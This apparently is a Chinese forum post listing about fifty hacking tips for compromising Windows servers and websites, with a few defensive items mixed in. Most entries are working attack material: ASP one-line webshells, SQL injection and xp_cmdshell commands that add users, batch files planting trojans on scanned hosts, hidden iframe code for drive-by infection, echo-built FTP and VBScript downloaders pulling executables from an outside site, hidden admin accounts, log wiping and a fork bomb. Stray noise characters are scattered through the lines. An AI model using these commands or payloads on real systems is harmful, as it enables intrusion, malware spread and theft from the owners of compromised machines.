1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,, y3 s1 Q P$ q
cacls C:\windows\system32 /G hqw20:R
4 I1 N9 b/ L0 W% C# l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
1 t3 J6 |+ C! k( h/ Q: A恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
& G* }- d# `+ L4 S& J+ Z9 b6 |% p' F2 a
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。: L: `. B1 T+ j5 f: x5 |
8 \: w. w: M- z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。8 U! g+ M0 K# n" h
+ u5 Y$ N8 h# S' l* H% ]
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
+ U' @9 {( J! ]3 q/ }1 b6 j9 y0 L0 R5 T
5、利用INF文件来修改注册表" _2 B7 Z' y+ s/ w% t
[Version]% O; p: M& N. \: S: m& l( u
Signature="$CHICAGO$"
& F& Q% N$ _# y& p1 S0 b[Defaultinstall]6 P' ~- Y! v( n9 z. r4 `, M; q
addREG=Ating
4 Q7 K0 y& @* f* U[Ating]
( }+ o( a! U. W0 A2 t! V6 ~5 lHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"0 V; k1 l) m. {9 J# J4 K/ Y
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:" Z2 t7 w% c) w" A0 B* b: u
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径. A% R' N" e2 W' s5 Z
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
6 k l8 Z: j2 f5 PHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# | d( x, C* b3 b/ s
HKEY_CURRENT_CONFIG 简写为 HKCC
" a" m4 q8 O. n+ h. v0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
5 E N( D; w: y, P& N- b9 ~"1"这里代表是写入或删除注册表键值中的具体数据8 n2 h. ~/ [ P# @: A+ w8 C) _
& n7 x: Z5 B6 G* N. C7 h( Y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
4 a+ P8 }. _- L& y3 z' L多了一步就是在防火墙里添加个端口,然后导出其键值% f: \4 F9 \! S+ d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]6 ~' S( O6 P1 |
7 ~" C7 _/ ~0 v: m6 e0 ^7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽; g2 \, }- l- N1 v
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 e5 e' \2 q, f4 E: O- I! u) u g0 ?2 l8 Z7 X! q# g
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。' D8 A# O9 \8 [( K+ @
8 Q! E+ d" d5 |) m9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,7 u( X& r$ h; w
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。% {4 p4 y6 R* T/ S! F, U) D: n s
' A7 p' V3 b' y+ h& `+ V10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”0 M# H5 g1 i6 d; b
0 ?1 O2 F% t2 H( E11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,/ _9 Z6 a1 I# }; k% @9 t
用法:xsniff –pass –hide –log pass.txt. i% l! {+ H% z: m( k+ i! ]
9 B% P1 H9 b& W7 ?* }12、google搜索的艺术( ]7 P* b% `+ {, H( E6 l
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- `; A' L$ \! [- {2 }- h或“字符串的语法错误”可以找到很多sql注入漏洞。7 L5 v% u" ]! H+ a6 I/ H4 A
3 l1 N+ V) j% [: |
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。) I" r1 M$ t& `8 p7 i$ ]
* e9 N2 ~+ D: k2 P$ k14、cmd中输入 nc –vv –l –p 1987
/ H7 O1 n4 [6 x% u0 x0 b做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃" S; I+ }! g- b6 I* g) v
- a. ?( b' Z! p8 t# J* B4 v15、制作T++木马,先写个ating.hta文件,内容为. Z0 |6 }7 f8 X9 I& k, {
<script language="VBScript">
' V4 f. \) U5 V+ I5 j9 ^set wshshell=createobject ("wscript.shell" )
% `! ?# ]* j' U) [5 t4 Z9 u3 ~ ga=wshshell.run("你马的名称",1)
( e0 O3 z& f& a* Z; wwindow.close4 x9 _+ s6 @3 N9 G! A4 ~
</script>$ N) r" ~$ H' D& f' c4 F0 x* P
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
" n, m" Z! }; s/ D2 u+ p9 J+ E- f0 e4 h+ d3 p1 ~; w
16、搜索栏里输入
/ x7 i+ T0 U. ~3 a/ R% k关键字%'and 1=1 and '%'=': P- g' Z8 U) i
关键字%'and 1=2 and '%'='7 |) C! K/ \& N7 p
比较不同处 可以作为注入的特征字符
" V! U& p( F5 I: M! }& w Z' D* m8 C$ W# O1 F
17、挂马代码<html>2 E) ^$ w3 o1 O$ M
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! B+ V: |6 o( G6 g C</html>
p- O8 c/ ~% b( q: `$ I/ i
; V4 Q% @4 f& a+ Y% U18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,( ~0 k! P# i4 t
net localgroup administrators还是可以看出Guest是管理员来。& A" M$ L m' d- w+ p! N/ x1 r
7 h5 C9 B, v) U; j/ V4 _( n19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等0 i2 V- ^0 E: z' H; ^
用法: 安装: instsrv.exe 服务名称 路径
. b, U& d# h4 e- t& |, M/ a& g4 [卸载: instsrv.exe 服务名称 REMOVE$ P: ]& C4 x9 B
& E$ z9 r0 }# `& S4 m2 V
/ _: V( j, I) W. N1 e
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
: y) Y6 F" Q) k$ a7 e不能注入时要第一时间想到%5c暴库。" \# V, {/ h! t- _
/ P# m$ j( V, v2 B* L, a7 ]+ A3 i/ w
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
8 X2 A s3 I- m
+ G E# T% F8 y4 Q2 b3 ~% D8 ~; v' F23、缺少xp_cmdshell时5 G" B5 Q- F* H. ^( \3 X& g
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
J( f" J5 @" _/ w# o, p" r9 z: t假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 q0 S: i3 q# {. [$ s9 Y# Ndeclare @o int+ G! @ B& A0 X. }+ T' p- y- Z% V0 I9 G
exec sp_oacreate 'wscript.shell',@o out
& S1 l3 m; A* O# Y) A+ `4 t" Fexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员3 ~, n9 ]8 I+ Z# m1 n' [# {2 x
% j& l& {5 Z+ k8 `* F5 }8 D+ e7 X3 ~24.批量种植木马.bat
8 {8 p( q3 ]' C; g2 rfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
1 @2 r0 o" h- v7 Z$ r6 l R6 I0 c7 M/ Nfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间 o- T% Z0 Z+ m: |" f# I
扫描地址.txt里每个主机名一行 用\\开头 X, C7 h$ G- M' J
7 `- E9 j6 c; `7 K8 j
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
" b$ J5 y8 ^) ~3 H. m1 j! ^' t/ G* j
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
% O8 l8 K: L1 @9 E将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.& \. P4 B" s q6 Z# ]# `/ U0 n
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
" P- z5 k& A$ ]" a: a0 x' {4 T3 P7 @
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
- a; e$ d2 ~- c- j8 B6 m9 ]1 |然后用#clear logg和#clear line vty *删除日志+ B- N% N3 g: j$ O
) S1 w, a0 {3 j7 h8 z# ~2 v* L28、电脑坏了省去重新安装系统的方法
; e! n* n, x/ b. Z* l纯dos下执行,& u% r1 K* E5 R5 _
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config/ o3 n" {+ b) V" }: N# T- z
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 G# i7 n- h* B1 n# D. @8 L$ w1 t( T+ f7 @" g+ G2 r
29、解决TCP/IP筛选 在注册表里有三处,分别是:# ?& }, {, D8 p* T3 V" g
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip2 o3 ~3 \' h0 u- Q& g: I, M
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ @1 O* x1 ]0 q9 Z5 _
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 u7 W% b; v+ z* [: n
分别用" y4 t) H' @9 l) m$ v3 K! U
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ P3 O+ X" y3 F \+ Z0 {
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
1 x" y" {+ E4 ?! L; p5 s' S) s! \0 Qregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! x+ y m; [3 p& O! x$ B2 y1 C
命令来导出注册表项
. Y1 m& ?$ `! q7 L* r9 B' Y然后把三个文件里的EnableSecurityFilters"=dword:00000001,; Z% o' t, z7 \5 Q& e
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
, k8 M. o. v. y3 i* f- O9 [( ~regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。0 l2 k7 K+ K' L4 [
' [6 |0 x2 [3 \" F& K
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! p& ]1 L( o- O
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
, x4 ~1 m3 B% K2 W! J: [( ]( e1 ]; l6 s
31、全手工打造开3389工具
+ F5 `- k" J9 D1 C8 A3 t" T8 o打开记事本,编辑内容如下:
e' F! _9 G* T- p, x0 ~3 @echo [Components] > c:\sql
: S4 F* l ~7 U, O: F! h# Xecho TSEnable = on >> c:\sql; Z1 x: l( C+ f5 a0 a* ~
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) [ f5 Q% n* k
编辑好后存为BAT文件,上传至肉鸡,执行
/ {# q: f0 y4 s( _ S0 u |6 f4 m: t6 J( P! n2 Z* c* F7 s3 C" x
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马. r# @ z+ w3 A0 M( ] d1 _1 `
" I0 Q! V( T* ]) z6 h
33、让服务器重启 V' d8 ~9 ^7 o3 r$ t; v9 v
写个bat死循环:
. G" B, ?5 M# ]9 B1 W1 Y@echo off
" S' ~; n. d- V! m# |* y. o, x0 c:loop1
- U( j. H7 T9 e& M( O1 qcls: x0 Z! \: g' h4 ~' @3 [; D/ S
start cmd.exe
7 k& V6 a4 M" W8 I# ygoto loop1
0 P" C3 e1 E) d. u2 F9 l: [, s' g保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
H% _9 r) D, M5 d+ \ K/ B n l
2 s3 V( g6 Z1 P% C3 S- `" K34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
% R, Y% H4 Z' A L@echo off* R. y& L9 j& M l( ]
date /t >c:/3389.txt; R- N0 a7 T. T6 U/ B
time /t >>c:/3389.txt5 ~( b* a. `6 f9 F: f
attrib +s +h c:/3389.bat
' q( ^0 C8 u1 L5 Nattrib +s +h c:/3389.txt
3 L6 |/ v2 b2 P! y# ?netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
7 v0 r, N# V/ d0 p并保存为3389.bat
: l5 l+ f2 |; k6 c8 N打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
/ K' q9 W x% S2 c7 x: a' k( e
: e+ m1 g" K+ [: _7 l! c6 @35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: D+ U5 z- ^5 o) Pstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
$ x; M- _5 R! Z6 U& u输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。% s% o+ M" L7 X4 `9 G3 `+ t7 u
& g* D: p* Q* `0 y36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
# _0 X' L1 G5 X2 B1 Oecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址# S7 a+ w: t2 X. K+ P C
echo 你的FTP账号 >>c:\1.bat //输入账号
3 K* r7 D8 V5 N! K8 Yecho 你的FTP密码 >>c:\1.bat //输入密码& Z P% w3 t5 }8 F- O" K1 |
echo bin >>c:\1.bat //登入! I! `' _+ b2 R! H
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ l2 a' ^; P9 `( n1 m5 techo bye >>c:\1.bat //退出5 P. F3 y6 A2 X/ a5 z4 [5 A: N
然后执行ftp -s:c:\1.bat即可
?+ I$ w. m7 d
& A( c: p; x, s9 e+ i$ O7 f37、修改注册表开3389两法
3 p6 ~: b5 n0 v* t/ o(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表* F( x. m! k, T$ o
echo Windows Registry Editor Version 5.00 >>3389.reg9 {. K/ X. E. u- T4 i3 r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg/ g% U3 Z' B9 x3 I0 e
echo "Enabled"="0" >>3389.reg' u7 v+ o4 R9 P% R
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows$ M. Y% N/ t0 H% @2 s6 [
NT\CurrentVersion\Winlogon] >>3389.reg
' d3 C5 f0 A! v* M/ |echo "ShutdownWithoutLogon"="0" >>3389.reg& A2 v2 D6 e& v' P" _) S7 K$ {8 C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ h5 j6 _) `( ?0 }>>3389.reg
% @6 T5 k; r# M" V3 i. Y8 Z6 Oecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
6 Q4 X- A7 w3 T7 s5 y( G# decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]1 F; U5 [# m3 R4 N, X3 T/ u
>>3389.reg" [" F' B+ J. n7 P
echo "TSEnabled"=dword:00000001 >>3389.reg# L. V) W! {5 u$ j$ ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
; e- Z6 e) i( w( A* F6 |5 uecho "Start"=dword:00000002 >>3389.reg
% J: Z8 t4 p; T kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]& @, ]2 ^# @* r/ ?
>>3389.reg) t5 o2 }! C% m2 Y6 A
echo "Start"=dword:00000002 >>3389.reg k% ~3 E9 S. }
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg0 j' ~- i& ` e, \5 E
echo "Hotkey"="1" >>3389.reg9 X# s2 A& D+ x K2 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; ]1 U) M2 Y% K
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
^2 j( g2 B5 _echo "PortNumber"=dword:00000D3D >>3389.reg% P Z3 w+ k% L8 a/ w9 {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 u, N- V7 G9 u" j8 D# v4 N" o
Server\WinStations\RDP-Tcp] >>3389.reg N2 w8 M0 m1 \" g+ P
echo "PortNumber"=dword:00000D3D >>3389.reg
9 h! ]5 | X: k( V" ~1 }8 b把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
- H# M9 t7 |/ L6 W, S% y(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
9 l! E; H% |; U6 a2 W9 C因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效6 P/ t4 F4 s! G/ D+ X: {
(2)winxp和win2003终端开启
5 D1 |8 z0 |- k2 C4 K" \' Z( J5 B5 W用以下ECHO代码写一个REG文件:
* Z* w6 }4 b1 Uecho Windows Registry Editor Version 5.00>>3389.reg, t6 A+ I( ~$ Z) k+ S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( E3 O N7 T: N8 iServer]>>3389.reg
$ q6 [* O' W0 {+ F/ Decho "fDenyTSConnections"=dword:00000000>>3389.reg
% O, r, G: O. }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* _7 Q+ j/ }% U7 j2 l# O3 f( z. k
Server\Wds\rdpwd\Tds\tcp]>>3389.reg. a( Y7 G; l* z* F( t7 x4 o W. q8 B
echo "PortNumber"=dword:00000d3d>>3389.reg0 { X! m6 e& k) \1 g3 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# _: v6 c+ R6 D9 i: z8 q6 E; O
Server\WinStations\RDP-Tcp]>>3389.reg2 e! u+ t6 T8 n, F4 @
echo "PortNumber"=dword:00000d3d>>3389.reg+ V; J% g% D8 | T+ ?; _
然后regedit /s 3389.reg del 3389.reg
, |/ o) ?, t3 D1 y9 ~+ P& X1 ?% mXP下不论开终端还是改终端端口都不需重启' O( b6 f7 }8 I- k* _
: ?( T& ]8 B9 a- }
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃. [3 `1 m5 e$ U2 D, s9 v
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
5 M+ B) G' |6 x ]+ \- S( e O
( v* T& a/ Q7 ^" J% D39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!: b8 K0 O1 m* w# r5 j
(1)数据库文件名应复杂并要有特殊字符
3 K; z+ p7 b' R% A( k4 I! H/ b7 U3 \(2)不要把数据库名称写在conn.asp里,要用ODBC数据源6 Y+ @7 i& `: h4 B; P
将conn.asp文档中的
3 A! j& B" [* H& cDBPath = Server.MapPath("数据库.mdb")
4 e, U q* o* d# h4 K5 M$ T! D* }conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
9 T. ?& ^! M6 C9 u
w. @/ E3 u1 K; n+ z( J& B$ t2 e( q修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
! m! o, i9 D) L! A. v$ |(3)不放在WEB目录里4 [% A. x h* r N" m. ?5 Z) }
0 A$ }/ A# F2 Q5 z2 E& P0 N
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉8 N2 J$ I. G+ i9 X
可以写两个bat文件
: n" f) A! Y& t@echo off
' r7 k# K: s3 d( Q" t: j@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
. D! s* \, |2 R! z& d+ q3 W2 S. d3 H@del c:\winnt\system32\query.exe: u4 v6 K! k# Q4 M; p) `' f
@del %SYSTEMROOT%\system32\dllcache\query.exe
% X: i/ @& w" h8 ?1 N7 n, i@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
# g5 m* b+ p/ P: h9 Q
9 W+ t, a9 ]! n@echo off
n, B+ ]- P7 X, \* O3 J- y@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 ^. O9 _! M+ l9 o1 Q8 N6 [9 X* {
@del c:\winnt\system32\tsadmin.exe
2 H( \/ H4 K) Y! Z@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! @- [( n: c3 @2 f" n
7 A% Z1 \: M( v/ g; U# R/ ^" i
41、映射对方盘符. R- A2 y; p Y
telnet到他的机器上,9 E* p! R; f4 @; E- j/ S! I2 Q
net share 查看有没有默认共享 如果没有,那么就接着运行
2 ?, X5 A! l; Tnet share c$=c:
% V' r5 d1 T, g% w* U; Cnet share现在有c$
7 B- S" _# b- \在自己的机器上运行$ {2 V8 b3 N) g& e/ G
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 G7 I$ R( J7 t2 c, A
4 l* G* O3 _( A; X$ V/ c42、一些很有用的老知识
9 P0 N4 c% v% z" Y9 D4 ^type c:\boot.ini ( 查看系统版本 )
. X* d2 N- b. {3 Enet start (查看已经启动的服务)" t+ Q0 w2 o% ?$ I
query user ( 查看当前终端连接 )
8 \! F- K( B. e9 p: r2 H; `net user ( 查看当前用户 )
& N% h% ~0 k( N! Y' w7 }( tnet user 用户 密码/add ( 建立账号 )
! Y: U% ]7 s) m$ n, W* Ynet localgroup administrators 用户 /add (提升某用户为管理员)1 x7 r2 J" Z, Y: n k; C- W& K
ipconfig -all ( 查看IP什么的 )
$ M Q* E! X0 f( g. \1 Pnetstat -an ( 查看当前网络状态 )
) ]) ^ B8 i& y' E! e& j8 k9 {findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)' V1 U6 M" n1 E9 w+ ]! ?% ]
克隆时Administrator对应1F4; |+ }+ P% h2 m
guest对应1F56 v5 \; K: K3 r0 O
tsinternetuser对应3E8
0 ?4 j5 ?) L% p; M! B. K9 A! i7 X9 d6 u2 w: x
43、如果对方没开3389,但是装了Remote Administrator Service
* O: {# u7 C9 U# Q用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 m( J9 ^% q$ h& Q, K解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
8 T8 u5 L) K2 w3 e8 U/ ?先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
& |5 O7 [! l4 X) D) g" T0 I& Z
8 u* g. r% i0 k; j44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
' g& Z: D' ?! k8 x: i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
$ B: X6 y1 M5 B/ u l# f# D- L& J. I( G( e- X8 |+ r
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
8 a8 N# O1 J3 J5 Z. X" c% U5 k4 Recho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
9 I; ~/ @1 R- F- K) R^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =1 u" F7 y& C# g; ] I+ p- Q
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =4 M- \* U2 T) a, @6 \* R
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs: T, j' b( ?9 J- f; S2 E
(这是完整的一句话,其中没有换行符)
% P' F% @. n @: a然后下载: X( _+ V! v/ b" r
cscript down.vbs http://www.hack520.org/hack.exe hack.exe- X# A" \; R' D0 ^5 {' f
+ m+ y: s5 a* F46、一句话木马成功依赖于两个条件:
" B! {3 |; ^7 a7 \, b) V; o1、服务端没有禁止adodb.Stream或FSO组件
( ?' U4 H, |& \& ?1 Z' P+ S: Z: h) l2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。4 j0 H C( W/ V* n' x" z* g% L
* p1 U- T' z5 `, C% a4 \2 Y47、利用DB_OWNER权限进行手工备份一句话木马的代码:
; _7 f" T0 {2 Y- P5 \2 ^;alter database utsz set RECOVERY FULL--
! m; B7 o8 W# x9 P% O;create table cmd (a image)-- l( e* D% L8 |
;backup log utsz to disk = 'D:\cmd' with init--
- M1 k8 R# [. b0 z;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--7 w: A1 i _$ o
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
9 @6 D6 ^. C8 ^+ k& J注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% C0 ^; X; t* k) V/ l! j/ y# r* m& y w
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:( b5 i* T! {8 Y
% ?) S& h. I/ d% S" M+ c4 m! j2 F T8 c; N
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options5 \$ t _$ q1 G9 W4 P- v4 u. t$ L
所有会话用 'all'。( W a/ q, K' m7 [: N1 ]
-s sessionid 列出会话的信息。
( {0 f' ], k1 o+ Y: D-k sessionid 终止会话。9 c& B9 ?; V {) A, l* M
-m sessionid 发送消息到会话。- C2 ~3 u4 e& V6 M
% z5 K' ^7 L+ y4 y" J% @" zconfig 配置 telnet 服务器参数。
' k; O/ |9 r k" t; g- }1 H0 g- q; B7 X
common_options 为:# R$ Q& `+ F& p
-u user 指定要使用其凭据的用户
5 t) ^/ n/ ^/ F" q) a; e' [7 ?-p password 用户密码3 n4 ?# e, _: e5 P: q' ?
4 x' R0 ~4 c4 x' I
config_options 为:
2 \% {7 l" ]! ]$ B% ?. S; [dom = domain 设定用户的默认域8 u7 h' V# K3 {# O8 y2 y5 x4 t
ctrlakeymap = yes|no 设定 ALT 键的映射
$ K# Y; T* ]+ {1 e: ctimeout = hh:mm:ss 设定空闲会话超时值
' O" W- e. `* y$ I. Gtimeoutactive = yes|no 启用空闲会话。7 s3 Y; v9 p) y" k; J4 V- a7 e; v
maxfail = attempts 设定断开前失败的登录企图数。, m, m; r( ?' e
maxconn = connections 设定最大连接数。4 r8 W2 g# F0 C) v+ {, e2 |
port = number 设定 telnet 端口。0 D! R8 ~9 k) W
sec = [+/-]NTLM [+/-]passwd
1 B: S4 a, q. R% d$ [3 V设定身份验证机构
1 Y4 L+ D2 S6 N9 i* ^fname = file 指定审计文件名。" h4 \, Y& q. f# s% R9 d) N
fsize = size 指定审计文件的最大尺寸(MB)。
; j% I! D& X$ s o: P" dmode = console|stream 指定操作模式。
, R8 ? k( V1 S* a% yauditlocation = eventlog|file|both, Y9 |8 W o. w9 |; G
指定记录地点
, a+ l+ \4 ~( h3 Z: d6 q raudit = [+/-]user [+/-]fail [+/-]admin
# U7 a: W) u: T- w) V
$ k! p: x' g1 ^49、例如:在IE上访问:( J; Z2 X: \& U+ y
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. j: q% O: n, ~* ?
hack.txt里面的代码是:
* b# o. S& [9 Y6 g- u5 G5 w1 F7 v<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">+ f' D! u* j6 s$ W" R0 Q. l
把这个hack.txt发到你空间就可以了!1 z/ G9 v8 D1 q. F k
这个可以利用来做网马哦!
. f% Z. R+ a. F. ^6 M
4 g% i' b8 D( s* O1 R2 A3 r50、autorun的病毒可以通过手动限制!
~" J0 v# S2 F; D/ I1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!: b+ |2 K9 s5 ]4 P, [
2,打开盘符用右键打开!切忌双击盘符~
4 F2 \8 O% l P/ E" q) Q3 e3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ ]- e* I+ I1 J3 M
4 b3 a1 \' n: _8 Z: }* n' E6 P51、log备份时的一句话木马:/ G9 W5 e4 ?( n$ E
a).<%%25Execute(request("go"))%%25>8 l) T8 t, d1 K2 w9 o
b).<%Execute(request("go"))%>
2 y I" ^; [3 l7 Ac).%><%execute request("go")%><%
, E6 [6 R$ b; S7 wd).<script language=VBScript runat=server>execute request("sb")</Script>
; t) A. P" o+ D) Y& ce).<%25Execute(request("l"))%25>* t0 B# a: T* s' {
f).<%if request("cmd")<>"" then execute request("pass")%>, d1 D j3 T7 |6 y! i; |5 c8 X# ?
4 ?7 t8 p6 o8 B) q2 y& I+ D. |# \" d
52、at "12:17" /interactive cmd
